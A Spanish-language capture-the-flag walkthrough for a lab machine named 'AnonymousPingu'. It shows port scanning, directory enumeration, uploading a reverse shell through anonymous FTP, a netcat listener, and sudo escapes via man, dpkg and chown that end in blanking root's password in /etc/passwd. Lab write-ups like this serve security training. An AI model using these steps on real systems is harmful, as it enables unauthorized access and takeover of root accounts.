AnonymousPingu

✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 29/04/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 21 perteneciente al servicio FTP y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p21,80 -v 172.17.0.2

para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web que nos muestra sea una de mantenimiento.

Ahora buscaremos directorios con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

🚀 EXPLOTACIÓN

Vemos un directorio interesante que es /uploads entonces podemos subir archivos por lo que probamos subir a través de FTP siendo anónimos una Reverse Shell.

Comprobamos que esta el archivo subido correctamente y nos ponemos en escucha.

nc -lnvp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Comprobamos con GTFOBins con permisos SUDO en man.

sudo -u pingu /usr/bin/man
!bin/sh

Ahora somos el usuario Pingu.

Comprobamos con GTFOBins con permisos SUDO en dpkg.

sudo -u gladys dpkg -l
!/bin/bash

Comprobamos con GTFOBins con permisos SUDO en chown.

sudo /usr/bin/chown gladys:gladys /etc
/usr/bin/sed -i 's/root:x:/root::/g' /etc/passwd #no tenemos permisos con nano o vim

Last updated

Was this helpful?